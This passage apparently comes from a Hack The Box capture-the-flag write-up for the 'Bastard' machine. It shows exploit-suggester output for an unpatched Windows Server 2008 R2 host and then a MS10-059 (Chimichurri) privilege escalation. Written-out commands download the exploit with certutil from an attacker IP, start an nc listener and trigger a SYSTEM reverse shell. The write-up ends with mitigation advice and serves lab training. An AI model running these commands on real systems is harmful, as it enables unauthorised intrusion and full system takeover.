CVE: CVE-2012-0159
KB: KB2676562
Title: Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0013
KB: KB2584146
Title: Vulnerability in Microsoft Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0008
KB: KB2778930
Title: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: http://www.exploit-db.com/exploits/24485

Date: 20130108
CVE: CVE-2013-0005
KB: KB2736418
Title: Vulnerability in Open Data Protocol Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0004
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0004
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0007
KB: KB2758694
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0007
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 3.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0007
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0006
KB: KB2758694
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 4.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0006
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 3.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0006
KB: KB2757638
Title: Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0001
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0001
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121211
CVE: CVE-2012-4786
KB: KB2753842
Title: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0002
KB: KB2742598
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0002
KB: KB2756920
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2555
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100112
CVE: CVE-2010-0018
KB: KB972270
Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111011
CVE: CVE-2011-1247
KB: KB2564958
Title: Vulnerability in Microsoft Active Accessibility Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1284
KB: KB2813170
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130312
CVE: CVE-2013-1285
KB: KB2807986
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130312
CVE: CVE-2013-1286
KB: KB2807986
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130312
CVE: CVE-2013-1287
KB: KB2807986
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130212
CVE: CVE-2013-1281
KB: KB2790978
Title: Vulnerability in NFS Server Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1282
KB: KB2772930
Title: Vulnerability in Active Directory Could Lead to Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Active Directory Services
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1282
KB: KB2772930
Title: Vulnerability in Active Directory Could Lead to Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Active Directory Lightweight Directory Services
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1283
KB: KB2840149
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20130409
CVE: CVE-2013-1283
KB: KB2808735
Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0043
KB: KB2425227
Title: Vulnerabilities in Kerberos Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110308
CVE: CVE-2011-0042
KB: KB2479943
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110208
CVE: CVE-2011-0045
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0002
KB: KB2667402
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0002
KB: KB2621440
Title: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0003
KB: KB2631813
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: DirectShow
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0001
KB: KB2644615
Title: Vulnerability in Windows Kernel Could Allow Security Feature Bypass
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Security Feature Bypass
Exploit: n/a

Date: 20120313
CVE: CVE-2012-0006
KB: KB2647170
Title: Vulnerability in DNS Server Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20120214
CVE: CVE-2010-5082
KB: KB2643719
Title: Vulnerability in Color Control Panel Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20120110
CVE: CVE-2012-0004
KB: KB2631813
Title: Vulnerabilities in Windows Media Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: DirectShow
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101012
CVE: CVE-2010-1883
KB: KB982132
Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100608
CVE: CVE-2010-1880
KB: KB979482
Title: Vulnerabilities in Media Decompression Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Asycfilt.dll (COM component)
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100608
CVE: CVE-2010-1256
KB: KB982666
Title: Vulnerability in Internet Information Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0013
KB: KB2785220
Title: Vulnerability in Microsoft Windows Could Allow Security Feature Bypass
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Security Feature Bypass
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0486
KB: KB979309
Title: Vulnerabilities in Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Cabinet File Viewer Shell Extension 6.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20130108
CVE: CVE-2013-0011
KB: KB2769369
Title: Vulnerability in Windows Print Spooler Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1870
KB: KB2655992
Title: Vulnerability in TLS Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3961
KB: KB2442962
Title: Vulnerability in Consent User Interface Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100209
CVE: CVE-2010-0250
KB: KB975560
Title: Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft DirectX
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20101214
CVE: CVE-2010-3966
KB: KB2385678
Title: Vulnerability in Microsoft Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2731
KB: KB2124261
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-2731
KB: KB2271195
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100413
CVE: CVE-2010-0487
KB: KB979309
Title: Vulnerabilities in Windows Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Cabinet File Viewer Shell Extension 6.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20120710
CVE: CVE-2012-1891
KB: KB2698365
Title: Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Windows Data Access Components 6.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1896
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-1899
KB: KB2124261
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20100914
CVE: CVE-2010-1899
KB: KB2271195
Title: Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft Internet Information Services 7.5
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20121113
CVE: CVE-2012-1895
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110809
CVE: CVE-2011-1975
KB: KB2560656
Title: Vulnerability in Data Access Components Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Remote Code Execution
Exploit: n/a

Date: 20110809
CVE: CVE-2011-1977
KB: KB2487367
Title: Vulnerability in Microsoft Chart Control Could Allow Information Disclosure
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 4
Severity: Important
Impact: Information Disclosure
Exploit: n/a

Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/

Date: 20111229
CVE: CVE-2011-3414
KB: KB2656355
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Elevation of Privilege
Exploit: n/a

Date: 20111229
CVE: CVE-2011-3417
KB: KB2656355
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Elevation of Privilege
Exploit: n/a

Date: 20111229
CVE: CVE-2011-3416
KB: KB2656355
Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110712
CVE: CVE-2011-1870
KB: KB2507938
Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1872
KB: KB2525835
Title: Vulnerability in Hyper-V Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20120508
CVE: CVE-2012-0178
KB: KB2690533
Title: Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1268
KB: KB2536276
Title: Vulnerability in SMB Client Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20111213
CVE: CVE-2011-3397
KB: KB2618451
Title: Cumulative Security Update of ActiveX Kill Bits
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1264
KB: KB2518295
Title: Vulnerability in Active Directory Certificate Services Web Enrollment Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20110614
CVE: CVE-2011-1267
KB: KB2536275
Title: Vulnerability in SMB Server Could Allow Denial of Service
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Denial of Service
Exploit: n/a

Date: 20110809
CVE: CVE-2011-1263
KB: KB2546250
Title: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20121113
CVE: CVE-2012-2519
KB: KB2729451
Title: Vulnerabilities in .NET Framework Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft .NET Framework 3.5.1
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2561
KB: KB2079403
Title: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component: Microsoft XML Core Services 3.0
Severity: Critical
Impact: Remote Code Execution
Exploit: n/a

[+] Missing patches: 108
– KB2656410: patches 10 vulnerabilities
– KB2676562: patches 10 vulnerabilities
– KB2659262: patches 10 vulnerabilities
– KB2817183: patches 6 vulnerabilities
– KB2507938: patches 5 vulnerabilities
– KB2729451: patches 5 vulnerabilities
– KB2840149: patches 4 vulnerabilities
– KB2705219: patches 4 vulnerabilities
– KB2742598: patches 4 vulnerabilities
– KB2757638: patches 4 vulnerabilities
– KB2712808: patches 4 vulnerabilities
– KB2756920: patches 4 vulnerabilities
– KB2808735: patches 4 vulnerabilities
– KB2807986: patches 3 vulnerabilities
– KB954430: patches 3 vulnerabilities
– KB2271195: patches 3 vulnerabilities
– KB2124261: patches 3 vulnerabilities
– KB2656355: patches 3 vulnerabilities
– KB2506212: patches 2 vulnerabilities
– KB2706045: patches 2 vulnerabilities
– KB2604114: patches 2 vulnerabilities
– KB2393802: patches 2 vulnerabilities
– KB2753842: patches 2 vulnerabilities
– KB2645640: patches 2 vulnerabilities
– KB2758694: patches 2 vulnerabilities
– KB2479943: patches 2 vulnerabilities
– KB2709715: patches 2 vulnerabilities
– KB2719177: patches 2 vulnerabilities
– KB982799: patches 2 vulnerabilities
– KB976323: patches 2 vulnerabilities
– KB2419640: patches 2 vulnerabilities
– KB979309: patches 2 vulnerabilities
– KB979482: patches 2 vulnerabilities
– KB974571: patches 2 vulnerabilities
– KB2621440: patches 2 vulnerabilities
– KB2727528: patches 2 vulnerabilities
– KB2535512: patches 2 vulnerabilities
– KB2475792: patches 2 vulnerabilities
– KB2716513: patches 2 vulnerabilities
– KB2813170: patches 2 vulnerabilities
– KB2631813: patches 2 vulnerabilities
– KB2719033: patches 2 vulnerabilities
– KB2667402: patches 2 vulnerabilities
– KB2772930: patches 2 vulnerabilities
– KB2425227: patches 2 vulnerabilities
– KB2790655: patches 1 vulnerability
– KB2653956: patches 1 vulnerability
– KB2525835: patches 1 vulnerability
– KB2618451: patches 1 vulnerability
– KB2789644: patches 1 vulnerability
– KB2483614: patches 1 vulnerability
– KB2736418: patches 1 vulnerability
– KB2770660: patches 1 vulnerability
– KB2690533: patches 1 vulnerability
– KB2785220: patches 1 vulnerability
– KB2758857: patches 1 vulnerability
– KB2621146: patches 1 vulnerability
– KB2207559: patches 1 vulnerability
– KB2546250: patches 1 vulnerability
– KB2564958: patches 1 vulnerability
– KB975560: patches 1 vulnerability
– KB979687: patches 1 vulnerability
– KB2423089: patches 1 vulnerability
– KB979688: patches 1 vulnerability
– KB2769369: patches 1 vulnerability
– KB2560656: patches 1 vulnerability
– KB2207566: patches 1 vulnerability
– KB2691442: patches 1 vulnerability
– KB2518295: patches 1 vulnerability
– KB2385678: patches 1 vulnerability
– KB2571621: patches 1 vulnerability
– KB2305420: patches 1 vulnerability
– KB2765809: patches 1 vulnerability
– KB2378111: patches 1 vulnerability
– KB978542: patches 1 vulnerability
– KB2570947: patches 1 vulnerability
– KB2536275: patches 1 vulnerability
– KB2536276: patches 1 vulnerability
– KB2487367: patches 1 vulnerability
– KB975467: patches 1 vulnerability
– KB2813347: patches 1 vulnerability
– KB2387149: patches 1 vulnerability
– KB2790113: patches 1 vulnerability
– KB2790978: patches 1 vulnerability
– KB2442962: patches 1 vulnerability
– KB972270: patches 1 vulnerability
– KB2294255: patches 1 vulnerability
– KB2347290: patches 1 vulnerability
– KB2743555: patches 1 vulnerability
– KB982132: patches 1 vulnerability
– KB2079403: patches 1 vulnerability
– KB2698365: patches 1 vulnerability
– KB977894: patches 1 vulnerability
– KB2778930: patches 1 vulnerability
– KB2643719: patches 1 vulnerability
– KB2655992: patches 1 vulnerability
– KB2296011: patches 1 vulnerability
– KB982666: patches 1 vulnerability
– KB2620712: patches 1 vulnerability
– KB2584146: patches 1 vulnerability
– KB2032276: patches 1 vulnerability
– KB2654428: patches 1 vulnerability
– KB2509553: patches 1 vulnerability
– KB2647170: patches 1 vulnerability
– KB2644615: patches 1 vulnerability
– KB2544893: patches 1 vulnerability
– KB2620704: patches 1 vulnerability
– KB2685939: patches 1 vulnerability
[+] Missing service pack
– Windows Server 2008 R2 for x64-based Systems Service Pack 1
[+] KB with the most recent release date
– ID: KB2817183
– Release date: 20130409

[+] Done. Displaying 207 of the 207 vulnerabilities found.

As we can see, the output from this tool is quite large! There are numerous privilege escalation vulnerabilities reported but in this writeup we will exploit a vulnerability known as MS10-059 (CVE-2010-2554 & CVE-2010-2555).

Date: 20100810
CVE: CVE-2010-2554
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

Date: 20100810
CVE: CVE-2010-2555
KB: KB982799
Title: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege
Affected product: Windows Server 2008 R2 for x64-based Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a

As shown above, the privilege escalation vulnerability abuses the tracing feature for services within affected Windows systems. More specifically, this vulnerability occurs due to improperly configured access control list settings on the registry keys for the service tracing feature.

To exploit this vulnerability, we must have access to a user with impersonation rights.

Let’s check if our compromised user has these rights:

whoami /priv

Excellent! It appears our current user has ‘SeImpersonatePrivilege’ enabled.

Now that we have confirmed that we have impersonation rights, let’s locate the matching exploit for MS10-059.

A quick search engine query will reveal that the exploit can be downloaded from numerous sources.

For this writeup, we’ll download the exploit from the following Github repository:

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri

Once downloaded to our local host, we’ll proceed by transferring the file to our victim machine:

python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 …

certutil.exe -urlcache -split -f “http://10.10.14.52:8000/Chimichurri.exe” chimichurri.exe

**** Online ****
000000 …
0bf800
CertUtil: -URLCache command completed successfully.

With our exploit transferred to the target system, we’ll need to open a listener on our attacking box for our reverse shell to connect back to:

sudo rlwrap nc -nlvp 80

Now that our listener is configured, we’ll provide the exploit with our attacking IP address and the port to connect back to:

chimichurri.exe 10.10.14.52 80

Now for the moment of truth, let’s fire up our exploit and see if we get a reverse shell!

/Chimichurri/–>This exploit gives you a Local System shell <BR>

/Chimichurri/–>Changing registry values…<BR>

/Chimichurri/–>Got SYSTEM token…<BR>

/Chimichurri/–>Running reverse shell…<BR>

/Chimichurri/–>Restoring default registry values…<BR>

Woohoo!

Our exploit successfully runs and we receive a shell as the system user!

Now let’s grab that root flag!

c:\inetpub\drupal-7.54>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt.txt

Conclusion and Review

To conclude our examination of this machine, let’s take a moment to reflect on what we can learn from this box:

  • When encountering a Drupal installation on a target system, attempt to see if the Drupal version may be vulnerable to a variant of the ‘Drupalgeddon’ vulnerability. There are several forms of this vulnerability that impact different versions of Drupal and many installations still remain to be patched. In addition, there are a slew of other vulnerabilities for Drupal that may be utilized for exploitation.
  • When targeting Windows systems, the ‘nc.exe’ binary can often be utilized to gain a reverse shell if code/command execution can be leveraged. In addition, this is also a useful tool for performing file transfers to and from Windows hosts.
  • MSFVenom can also be used to generate a malicious binary file that can be invoked to gain a reverse shell. It is also essential to become versed in how to operate this tool, as it will be a great asset both on your exam and in future engagements.
  • Lastly, when attacking Windows systems, the ‘windows-exploit-suggester’ tool can greatly aid in your ability to discover vulnerabilities that may impact the target machine. Often, these vulnerabilities may lead to privilege escalation when exploited.

Vulnerability Mitigation and Remediation

There are several key vulnerabilities and security issues present on this target. Let’s examine the nature of these vulnerabilities and discuss how we can defend against them:

  • The version of the Drupal installation running on the target system contains numerous vulnerabilities that can be exploited. It is crucial to ensure that software is regularly updated so that these vulnerabilities are patched.
  • It is wise to modify the default configuration of applications when hosted in a production environment. This includes removing or restricting access to unnecessary files on the hosted application that may aid an attacker. In this case, this includes files such as ‘CHANGELOG.txt’, which we utilized to gain the version information of the Drupal installation. Ultimately, this aided in our ability to achieve remote code execution.
  • The version of Windows running on the target system has not been properly patched or updated, leaving the system highly vulnerable to numerous methods of exploitation. In addition to this, the Windows version running on our victim machine is no longer supported, as Windows Server 2008 and Windows Server 2008 R2 reached end-of-life on January 14th, 2020. It is of the utmost importance for administrators to ensure that systems are continually patched and updated to avoid leaving systems vulnerable.

That concludes our analysis of Bastard!

This machine is great for learning about Drupal, as well as the infamous ‘Drupalgeddon’ vulnerability.

In addition, it is also good practice for exploring how to achieve reverse shells on Windows systems.

If you enjoyed this machine, head over to Hack The Box and give ch4p some respect!

Until next time,

Happy hacking!

Leave a Reply

Your email address will not be published. Required fields are marked *